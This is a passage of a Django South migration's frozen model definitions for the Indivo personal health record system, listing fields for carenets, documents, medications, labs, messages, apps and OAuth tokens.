'Meta': {'unique_together': "(('carenet', 'account'),)", 'object_name': 'CarenetAccount'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']"}),
'can_write': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'carenetaccount_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'})
},
'indivo.carenetautoshare': {
'Meta': {'unique_together': "(('carenet', 'record', 'type'),)", 'object_name': 'CarenetAutoshare'},
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'carenetautoshare_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Record']"}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.DocumentSchema']", 'null': 'True'})
},
'indivo.carenetdocument': {
'Meta': {'unique_together': "(('carenet', 'document'),)", 'object_name': 'CarenetDocument'},
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'carenetdocument_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Document']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'share_p': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'indivo.carenetpha': {
'Meta': {'unique_together': "(('carenet', 'pha'),)", 'object_name': 'CarenetPHA'},
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'carenetpha_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'pha': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.PHA']"})
},
'indivo.document': {
'Meta': {'unique_together': "(('record', 'external_id'),)", 'object_name': 'Document'},
'content': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'content_file': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'document_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'digest': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'fqn': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'nevershare': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'original': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'document_thread'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'pha': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pha_document'", 'null': 'True', 'to': "orm['indivo.PHA']"}),
'processed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'documents'", 'null': 'True', 'to': "orm['indivo.Record']"}),
'replaced_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'document_replaced'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'replaces': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Document']", 'null': 'True'}),
'size': ('django.db.models.fields.IntegerField', [], {}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': "orm['indivo.StatusName']"}),
'suppressed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'suppressed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Principal']", 'null': 'True'})
},
'indivo.documentprocessing': {
'Meta': {'object_name': 'DocumentProcessing'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'documentprocessing_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'processed_doc'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'})
},
'indivo.documentrels': {
'Meta': {'object_name': 'DocumentRels'},
'document_0': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'rels_as_doc_0'", 'to': "orm['indivo.Document']"}),
'document_1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'rels_as_doc_1'", 'to': "orm['indivo.Document']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'relationship': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.DocumentSchema']"})
},
'indivo.documentschema': {
'Meta': {'object_name': 'DocumentSchema'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'documentschema_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'internal_p': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'stylesheet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stylesheet'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'indivo.documentstatushistory': {
'Meta': {'object_name': 'DocumentStatusHistory'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'documentstatushistory_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'document': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'effective_principal': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'proxied_by_principal': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {}),
'record': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.StatusName']"})
},
'indivo.equipment': {
'Meta': {'object_name': 'Equipment', '_ormbases': ['indivo.Fact']},
'date_started': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'date_stopped': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'vendor': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'})
},
'indivo.fact': {
'Meta': {'object_name': 'Fact'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'allergy'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'allergy'", 'null': 'True', 'to': "orm['indivo.Record']"})
},
'indivo.immunization': {
'Meta': {'object_name': 'Immunization', '_ormbases': ['indivo.Fact']},
'administered_by': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'adverse_event': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'anatomic_surface': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'anatomic_surface_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'anatomic_surface_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'anatomic_surface_value': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'date_administered': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'sequence': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'vaccine_expiration': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'vaccine_lot': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'vaccine_manufacturer': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'vaccine_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'vaccine_type_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'vaccine_type_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'vaccine_type_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'})
},
'indivo.lab': {
'Meta': {'object_name': 'Lab', '_ormbases': ['indivo.Fact']},
'date_measured': ('django.db.models.fields.DateTimeField', [], {}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'first_lab_test_name': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'first_lab_test_value': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'first_panel_name': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'lab_address': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'lab_comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'lab_name': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'lab_type': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'non_critical_range_maximum': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'non_critical_range_minimum': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'normal_range_maximum': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'normal_range_minimum': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'})
},
'indivo.machineapp': {
'Meta': {'object_name': 'MachineApp'},
'app_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'consumer_key': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'principal_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True', 'primary_key': 'True'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
'indivo.measurement': {
'Meta': {'object_name': 'Measurement', '_ormbases': ['indivo.Fact']},
'datetime': ('django.db.models.fields.DateTimeField', [], {}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '24'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'value': ('django.db.models.fields.FloatField', [], {})
},
'indivo.medication': {
'Meta': {'object_name': 'Medication', '_ormbases': ['indivo.Fact']},
'brand_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'brand_name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'brand_name_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'brand_name_value': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'date_started': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'date_stopped': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'dispense_as_written': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'dose_textvalue': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'dose_unit': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'dose_unit_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'dose_unit_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'dose_unit_value': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'dose_value': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'frequency': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'frequency_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'frequency_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'frequency_value': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'name_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'name_value': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'prescribed_by_institution': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'prescribed_by_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'prescribed_on': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'prescribed_stop_on': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'prescription_duration': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'prescription_instructions': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'prescription_refill_info': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'route': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'route_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'route_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'route_value': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'strength_textvalue': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'strength_unit': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'strength_unit_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'strength_unit_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'strength_unit_value': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'strength_value': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'})
},
'indivo.message': {
'Meta': {'unique_together': "(('account', 'external_identifier', 'sender'),)", 'object_name': 'Message'},
'about_record': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Record']", 'null': 'True'}),
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']"}),
'archived_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'body': ('django.db.models.fields.TextField', [], {}),
'body_type': ('django.db.models.fields.CharField', [], {'default': "'plaintext'", 'max_length': '100'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'message_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'external_identifier': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'num_attachments': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'read_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'received_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'message_as_recipient'", 'to': "orm['indivo.Principal']"}),
'response_to': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'message_responses'", 'null': 'True', 'to': "orm['indivo.Message']"}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'message_as_sender'", 'to': "orm['indivo.Principal']"}),
'severity': ('django.db.models.fields.CharField', [], {'default': "'low'", 'max_length': '100'}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'indivo.messageattachment': {
'Meta': {'unique_together': "(('message', 'attachment_num'),)", 'object_name': 'MessageAttachment'},
'attachment_num': ('django.db.models.fields.IntegerField', [], {}),
'content': ('django.db.models.fields.TextField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'messageattachment_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'message': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Message']"}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'saved_to_document': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Document']", 'null': 'True'}),
'size': ('django.db.models.fields.IntegerField', [], {}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'indivo.nonce': {
'Meta': {'unique_together': "(('nonce', 'oauth_type'),)", 'object_name': 'Nonce'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nonce': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'oauth_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'indivo.notification': {
'Meta': {'object_name': 'Notification'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']"}),
'app_url': ('django.db.models.fields.CharField', [], {'max_length': '300', 'null': 'True'}),
'content': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notification_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Document']", 'null': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Record']", 'null': 'True'}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notifications_sent_by'", 'to': "orm['indivo.Principal']"})
},
'indivo.nouser': {
'Meta': {'object_name': 'NoUser', '_ormbases': ['indivo.Principal']},
'principal_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True', 'primary_key': 'True'})
},
'indivo.pha': {
'Meta': {'object_name': 'PHA'},
'autonomous_reason': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'callback_url': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'consumer_key': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True'}),
'frameable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'has_ui': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_autonomous': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'principal_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True'}),
'privacy_tou': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'schema': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.DocumentSchema']", 'null': 'True'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'start_url_template': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'indivo.phashare': {
'Meta': {'unique_together': "(('record', 'with_pha'),)", 'object_name': 'PHAShare'},
'authorized_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'authorized_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shares_authorized_by'", 'null': 'True', 'to': "orm['indivo.Account']"}),
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']", 'null': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'phashare_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pha_shares'", 'to': "orm['indivo.Record']"}),
'with_pha': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pha_shares_to'", 'to': "orm['indivo.PHA']"})
},
'indivo.principal': {
'Meta': {'object_name': 'Principal'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'principal_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'email': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'indivo.problem': {
'Meta': {'object_name': 'Problem', '_ormbases': ['indivo.Fact']},
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_onset': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_resolution': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'diagnosed_by': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '24', 'null': 'True'}),
'name_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'name_value': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'indivo.procedure': {
'Meta': {'object_name': 'Procedure', '_ormbases': ['indivo.Fact']},
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_performed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'name_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'name_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'provider_institution': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'provider_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
},
'indivo.record': {
'Meta': {'object_name': 'Record'},
'contact': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'the_record_for_contact'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'record_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'demographics': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'the_record_for_demographics'", 'null': 'True', 'to': "orm['indivo.Document']"}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '250', 'unique': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '60', 'null': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'records_owned_by'", 'null': 'True', 'to': "orm['indivo.Principal']"})
},
'indivo.recordnotificationroute': {
'Meta': {'unique_together': "(('account', 'record'),)", 'object_name': 'RecordNotificationRoute'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'recordnotificationroute_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notification_routes'", 'to': "orm['indivo.Record']"})
},
'indivo.reqtoken': {
'Meta': {'object_name': 'ReqToken', '_ormbases': ['indivo.Principal']},
'authorized_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'authorized_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']", 'null': 'True'}),
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']", 'null': 'True'}),
'oauth_callback': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True'}),
'pha': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.PHA']"}),
'principal_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True', 'primary_key': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Record']", 'null': 'True'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.PHAShare']", 'null': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'token_secret': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'verifier': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
'indivo.sessionrequesttoken': {
'Meta': {'object_name': 'SessionRequestToken'},
'approved_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sessionrequesttoken_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
